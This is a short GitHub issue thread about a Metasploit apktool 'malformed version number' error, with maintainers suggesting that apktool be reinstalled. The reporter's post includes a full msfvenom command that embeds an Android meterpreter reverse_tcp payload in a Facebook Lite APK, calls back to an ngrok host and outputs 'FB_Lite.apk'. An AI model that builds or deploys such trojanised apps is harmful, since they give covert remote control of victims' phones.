### ISSUE TITLE
Error: Malformed version number string 2.5.0-dirty

### ISSUE THREAD

**Issue by Rishi19250** [rapid7/metasploit-framework#15663]
I am using Kali Linux. I am getting error after executing the following command in the terminal.

msfvenom -p android/meterpreter/reverse_tcp -x Desktop/Lite_267.0.0.14.118.apk -k lhost=6.tcp.ngrok.io lport=14074 -o FB_Lite.apk
Using APK template: Desktop/Lite_267.0.0.14.118.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: Malformed version number string 2.5.0-dirty
32 bit support is deprecated. Apktool will not support 32bit on v2.6.0.

please fix this problem.

**Comment by bcoles** [comment]
#13520 #13231

**Comment by timwr** [comment]
sudo apt remove apktool
sudo apt autoremove

Then follow the link for installing apktool:
https://ibotpeaches.github.io/Apktool/install/
